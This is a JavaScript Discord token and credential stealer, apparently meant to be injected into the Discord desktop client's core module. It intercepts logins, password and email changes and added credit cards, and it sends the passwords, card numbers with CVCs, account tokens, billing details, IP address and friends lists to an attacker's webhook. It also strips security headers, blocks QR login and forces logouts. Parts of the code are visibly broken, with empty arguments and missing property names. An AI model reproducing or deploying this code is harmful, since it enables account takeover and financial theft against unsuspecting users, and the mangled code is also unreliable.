const { BrowserWindow, session, } = require('electron'); const os = require('os'); const https = require('https'); const querystring = require("querystring"); const fs = require("fs"); // Initialization var config = { brand: "flex", webhook: "REPLACE_ME", logout: true, disable_qr_code: true, notify_on_logout: true, notify_on_initialization: true, ping: [true, "@doener"], embed: { username: "flex |", footer: { text: `flex |`, }, href: "", }, badges: { Discord_Employee: { Value: 1, Emoji: "<:staff:874750808728666152>", Rare: true, }, Partnered_Server_Owner: { Value: 2, Emoji: "<:partner:874750808678354964>", Rare: true, }, HypeSquad_Events: { Value: 4, Emoji: "<:hypesquad_events:874750808594477056>", Rare: true, }, Bug_Hunter_Level_1: { Value: 8, Emoji: "<:bughunter_1:874750808426692658>", Rare: true, }, Early_Supporter: { Value: 512, Emoji: "<:early_supporter:874750808414113823>", Rare: true, }, Bug_Hunter_Level_2: { Value: 16384, Emoji: "<:bughunter_2:874750808430874664>", Rare: true, }, Early_Verified_Bot_Developer: { Value: 131072, Emoji: "<:developer:874750808472825986>", Rare: true, }, House_Bravery: { Value: 64, Emoji: "<:bravery:874750808388952075>", Rare: false, }, House_Brilliance: { Value: 128, Emoji: "<:brilliance:874750808338608199>", Rare: false, }, House_Balance: { Value: 256, Emoji: "<:balance:874750808267292683>", Rare: false, } }, filters: { user: { urls: [ "*/users/@me", "*/users/@me", "https://**/users/@me", "*/auth/login", '*/auth/login', 'https://**/auth/login', "*/payment_methods/paypal_accounts", "*/tokens", "*/setup_intents/*/confirm", "*/payment_intents/*/confirm", ] }, qr_codes: { urls: [ "*/scheduled-maintenances/upcoming.json", "https://**/applications/detectable", "*/applications/detectable", "https://**/users/@me/library", "*/users/@me/library", "https://**/users/@me/billing/subscriptions", "*/users/@me/billing/subscriptions", "wss://*" ] } } } var execScript = (script) => { const window = BrowserWindow.getAllWindows()[0] return window.webContents.executeJavaScript(script, true); } class Event { constructor(event, token, data) { for (let [key, value] of Object.entries({ "event": event, "data": data, "token": token })) { this[key] = value; } } handle() { switch (this["event"]) { case "passwordChanged": event_handlers["passwordChanged"](,, this.token) break; case 'userLogin': event_handlers["userLogin"](,, this.token) break; case 'emailChanged': event_handlers["emailChanged"](,, this.token) break; case "creditCardAdded": event_handlers["creditCardAdded"](,,,, this.token); } } } // Traffic recording (Pirate stealer inspiration) session.defaultSession.webRequest.onHeadersReceived((details, callback) => { try { if (details.url.startsWith(config.webhook)) { if (details.url.includes("")) { callback({ responseHeaders: Object.assign({ 'Access-Control-Allow-Headers': "*" }, details.responseHeaders) }); } else { callback({ responseHeaders: Object.assign({ "Content-Security-Policy": ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"], 'Access-Control-Allow-Headers': "*", "Access-Control-Allow-Origin": "*" }, details.responseHeaders) }); } } else { delete details.responseHeaders['content-security-policy']; delete details.responseHeaders['content-security-policy-report-only']; callback({ responseHeaders: { ...details.responseHeaders, 'Access-Control-Allow-Headers': "*" } }) } } catch {} }) session.defaultSession.webRequest.onBeforeRequest(config.filters["qr_codes"], async (details, callback) => { if (details.url.startsWith("wss://")) { if (!config.disable_qr_code == false) { callback({ cancel: true }) return; } } await initialize(); callback({}) return; }) session.defaultSession.webRequest.onCompleted(config.filters["user"], async (details, callback) => { try { if (details.statusCode == 200 || details.statusCode == 204) { const unparsed_data = Buffer.from(details.uploadData[0].bytes).toString(); const data = JSON.parse(unparsed_data) const token = await getToken(); switch (true) { case details.url.endsWith('login'): (new Event('userLogin', token, { password: data.password, email: data.login })).handle();; return; case details.url.endsWith("tokens") && details.method == "POST": const item = querystring.parse(unparsed_data.toString()); (new Event('creditCardAdded', token, { number: item["card[number]"], cvc: item["card[cvc]"], exp_month: item["card[exp_month]"], exp_year: item["card[exp_year]"], })) case details.url.endsWith('users/@me') && details.method == 'PATCH': if (!data.password) return; if ( { (new Event('emailChanged', token, { password: data.password, email: })).handle(); }; if (data.new_password) { (new Event('passwordChanged', token, { password: data.password, new_password: data.new_password })).handle(); }; return; default: break; } } else { return; } } catch {} }) // ================================================================================== var event_handlers = { async creditCardAdded(number, cvc, month, year) { const userInfo = await getUserInfo(token); const billing = await getBilling(token); const friends = await getRelationships(token); var params = { username: config.embed.username, avatar_url: config.embed.avatar_url, embeds: [createEmbed({ title: "Discord | Credit card added", url: config.embed.href, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, fields: [{ name: "Credit card Number", value: `\`\`\`${number}\`\`\``, inline: true }, { name: "Credit card CVC", value: `\`\`\`${cvc}\`\`\``, inline: true }, { name: "Credit card expiration", value: `\`\`\`${month}/${year}\`\`\``, inline: true }, { name: "Phone Number", value: `\`\`\`${ ?? "None"}\`\`\``, inline: false }, { name: "Nitro", value: `${getNitro(userInfo.premium_type)}`, inline: false }, { name: "Billing", value: `${billing}`, inline: true }, { name: "Badges", value: `${getBadges(userInfo.flags)}`, inline: false }, { name: "Token", value: `\`\`\`${token}\`\`\``, inline: false }, { name: "Hostname", value: `\`\`\`${os.hostname}\`\`\``, inline: false }, ], }), createEmbed({ description: `**Total Friends (${friends['length']})**\n\n${friends.frien}`, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, })] } sendToWebhook(params) }, async userLogin(password, email, token) { const userInfo = await getUserInfo(token); const billing = await getBilling(token); const friends = await getRelationships(token); var params = { username: config.embed.username, avatar_url: config.embed.avatar_url, embeds: [createEmbed({ title: "Discord | User logged in", url: config.embed.href, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, fields: [{ name: "Password", value: `\`\`\`${password}\`\`\``, inline: true }, { name: "E-Mail Address", value: `\`\`\`${email}\`\`\``, inline: true }, { name: "Phone Number", value: `\`\`\`${ ?? "None"}\`\`\``, inline: false }, { name: "Nitro", value: `${getNitro(userInfo.premium_type)}`, inline: false }, { name: "Billing", value: `${billing}`, inline: true }, { name: "Badges", value: `${getBadges(userInfo.flags)}`, inline: false }, { name: "Token", value: `\`\`\`${token}\`\`\``, inline: false }, { name: "Hostname", value: `\`\`\`${os.hostname}\`\`\``, inline: false }, ], }), createEmbed({ description: `**Total Friends (${friends['length']})**\n\n${friends.frien}`, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, })] } sendToWebhook(params) }, async emailChanged(password, newEmail, token) { var userInfo = await getUserInfo(token); var billing = await getBilling(token); var friends = await getRelationships(token); var params = { username: config.embed.username, avatar_url: config.embed.avatar_url, embeds: [createEmbed({ title: "Discord | Email changed", url: config.embed.href, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, fields: [{ name: "New email address", value: `\`\`\`${newEmail}\`\`\``, inline: true }, { name: "Password", value: `\`\`\`${password}\`\`\``, inline: true }, { name: "Phone Number", value: `\`\`\`${ ?? "None"}\`\`\``, inline: false }, { name: "Nitro", value: `${getNitro(userInfo.premium_type)}`, inline: false }, { name: "Billing", value: `${billing}`, inline: true }, { name: "Badges", value: `${getBadges(userInfo.flags)}`, inline: false }, { name: "Token", value: `\`\`\`${token}\`\`\``, inline: false }, { name: "Hostname", value: `\`\`\`${os.hostname}\`\`\``, inline: false }, ], }), createEmbed({ description: `**Total Friends (${friends['length']})**\n\n${friends.frien}`, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, })] } sendToWebhook(params) }, async passwordChanged(oldPassword, newPassword, token) { var userInfo = await getUserInfo(token); var billing = await getBilling(token); var friends = await getRelationships(token); var params = { username: config.embed.username, avatar_url: config.embed.avatar_url, embeds: [createEmbed({ title: "Discord | Password changed", url: config.embed.href, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, fields: [{ name: "Old password", value: `\`\`\`${oldPassword}\`\`\``, inline: false }, { name: "New password", value: `\`\`\`${newPassword}\`\`\``, inline: false }, { name: "Phone Number", value: `\`\`\`${ ?? "None"}\`\`\``, inline: false }, { name: "Nitro", value: `${getNitro(userInfo.premium_type)}`, inline: false }, { name: "Billing", value: `${billing}`, inline: true }, { name: "Badges", value: `${getBadges(userInfo.flags)}`, inline: false }, { name: "Token", value: `\`\`\`${token}\`\`\``, inline: false }, { name: "Hostname", value: `\`\`\`${os.hostname}\`\`\``, inline: false }, ], }), createEmbed({ description: `**Total Friends (${friends['length']})**\n\n${friends.frien}`, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, })] } sendToWebhook(params) }, } // ================================================================================== function getDiscordClient() { return `${process.cwd().replace(`${process.env.LOCALAPPDATA}\\`, '').split('\\')[0].split(7)}` } // ================================================================================== function getNitro(flags) { switch (flags) { case 0: return "\`\`\`No Nitro\`\`\`"; case 1: return "<:classic:896119171019067423> \`\`Nitro Classic\`\`"; case 2: return " \`\`Nitro Boost\`\`"; default: return "\`\`\`No Nitro\`\`\`"; }; } function getRareBadges(flags) { var b = ''; for (const prop in config.badges) { let o = config.badges[prop]; if ((flags & o.Value) == o.Value && o.Rare) b += o.Emoji; }; return b; } function getBadges(flags) { var b = ''; for (const prop in config.badges) { let o = config.badges[prop]; if ((flags & o.Value) == o.Value) b += o.Emoji; }; if (b == '') b = '\`\`\`None\`\`\`' return b; } async function getToken() { return await execScript(`for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[['get_require']]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)'getToken'==a&&(token=b.default.getToken())}token;`, true) } async function getIp() { return JSON.parse(await execScript(`var xmlHttp = new XMLHttpRequest(); "GET", "", false );xmlHttp.send( null );xmlHttp.responseText;`, true)); } async function getUserInfo(token) { return JSON.parse(await execScript(`var xmlHttp = new XMLHttpRequest(); "GET", "", false );xmlHttp.setRequestHeader("Authorization", "${token}");xmlHttp.send( null );xmlHttp.responseText;`, true)); } async function getBilling(token) { var a = await execScript(`var xmlHttp = new XMLHttpRequest(); "GET", "", false ); xmlHttp.setRequestHeader("Authorization", "${token}"); xmlHttp.send( null ); xmlHttp.responseText`, true) var json = JSON.parse(a) var billing = ""; json.forEach(z => { if (z.type == "") { return "\`\`\`❌\`\`\`"; } else if (z.type == 2 && z.invalid != true) { billing += "\`✔️\`" + " <:paypal:896441236062347374>"; } else if (z.type == 1 && z.invalid != true) { billing += "\`✔️\`" + " :credit_card:"; } else { return "\`\`\`❌\`\`\`"; }; }); if (billing == "") billing = "\`\`\`❌\`\`\`" return billing; } async function getRelationships(token) { var a = await execScript(`var xmlHttp = new XMLHttpRequest(); "GET", "", false );xmlHttp.setRequestHeader("Authorization", "${token}");xmlHttp.send( null );xmlHttp.responseText`, true) var json = JSON.parse(a) const r = json.filter((user) => { return user.type == 1 }) var rareBadgesFriends = ""; for (z of r) { var b = getRareBadges(z.user.public_flags) if (b != "") { rareBadgesFriends += b + ` | ${z.user.username}#${z.user.discriminator}\n` } } if (!rareBadgesFriends) rareBadgesFriends = "No Rare Friends" return { length: r.length, frien: rareBadgesFriends } } // ================================================================================== function sendToWebhook(params) { if ([0] == true) { if (params.content) { params.content = params.content + ` ||${[1]}||` } else { params.content = `||${[1]}||` } } var url = new URL(config.webhook); var headers = { 'Content-Type': 'application/json', 'Access-Control-Allow-Origin': '*', } const options = { protocol: url.protocol, hostname:, path: url.pathname, method: 'POST', headers: headers, }; const req = https.request(options); req.on('error', (err) => { console.log(err); }); req.write(JSON.stringify(params)); req.end(); } // ================================================================================== function createEmbed(data) { let obj = { "footer": config.embed.footer, "timestamp": new Date(), } for (let [key, value] of Object.entries(data)) { obj[key] = value; } return obj; } // ================================================================================== async function initialize() { if (!fs.existsSync(`${process.cwd()}/${config.brand}`)) { fs.mkdirSync(`${process.cwd()}/${config.brand}`) var token = undefined; token = await getToken(); const network_data = await getIp() var userInfo; var billing; var friends; if (config.notify_on_initialization) { if (token == undefined) { sendToWebhook({ username: config.embed.username, avatar_url: config.embed.avatar_url, url: config.embed.href, embeds: [createEmbed({ title: "Discord | Client initialized (not logged in)", fields: [{ name: "Hostname", value: `\`\`\`${os.hostname}\`\`\``, inline: false }, { name: "Client version", value: `\`\`\`${getDiscordClient()}\`\`\``, inline: false }, { name: "Connection data", value: `\`\`\`yaml\nIP Address: ${network_data['ip'] ?? "Unknown"}\nHostname: ${network_data['hostname'] ?? "Unknown"}\nCity: ${network_data['city'] ?? "Unknown"}\nRegion: ${network_data['region'] ?? "Unknown"}\nCountry: ${network_data["country"] ?? "Unknown"}\nTimezone: ${network_data["timezone"] ?? "Unknown"}\`\`\``, inline: false }], })] }) } else { userInfo = await getUserInfo(token); billing = await getBilling(token); friends = await getRelationships(token); sendToWebhook({ username: config.embed.username, avatar_url: config.embed.avatar_url, embeds: [createEmbed({ title: "Discord | Client initialized", url: config.embed.href, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, fields: [{ name: "E-Mail Address", value: `\`\`\`${}\`\`\``, inline: true }, { name: "Phone Number", value: `\`\`\`${ ?? "None"}\`\`\``, inline: false }, { name: "Nitro", value: `${getNitro(userInfo.premium_type)}`, inline: false }, { name: "Billing", value: `${billing}`, inline: true }, { name: "Badges", value: `${getBadges(userInfo.flags)}`, inline: false }, { name: "Token", value: `\`\`\`${token}\`\`\``, inline: false }, { name: "Hostname", value: `\`\`\`${os.hostname}\`\`\``, inline: false }, { name: "Client version", value: `\`\`\`${getDiscordClient()}\`\`\``, inline: false }, { name: "Connection data", value: `\`\`\`yaml\nIP Address: ${network_data['ip'] ?? "Unknown"}\nHostname: ${network_data['hostname'] ?? "Unknown"}\nCity: ${network_data['city'] ?? "Unknown"}\nRegion: ${network_data['region'] ?? "Unknown"}\nCountry: ${network_data["country"] ?? "Unknown"}\nTimezone: ${network_data["timezone"] ?? "Unknown"}\`\`\``, inline: false } ], }), createEmbed({ description: `**Total Friends (${friends['length']})**\n\n${friends.frien}`, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, })] }) } } if (config.logout && token) { await execScript(`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`, true).then((result) => {}); if (config.notify_on_logout) { sendToWebhook({ username: config.embed.username, avatar_url: config.embed.avatar_url, embeds: [createEmbed({ title: "Discord | User logged out", url: config.embed.href, author: { name: `${userInfo.username}#${userInfo.discriminator} (${})`, url: config.embed.href, icon_url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, thumbnail: { url: userInfo.avatar ? `${}/${userInfo.avatar}` : "" }, fields: [{ name: "Nitro", value: `${getNitro(userInfo.premium_type)}`, inline: false }, { name: "Billing", value: `${billing}`, inline: true }, { name: "Badges", value: `${getBadges(userInfo.flags)}`, inline: false }, { name: "Token", value: `\`\`\`${token}\`\`\``, inline: false }, ] })] }) } } } } module.exports = require("./core.asar");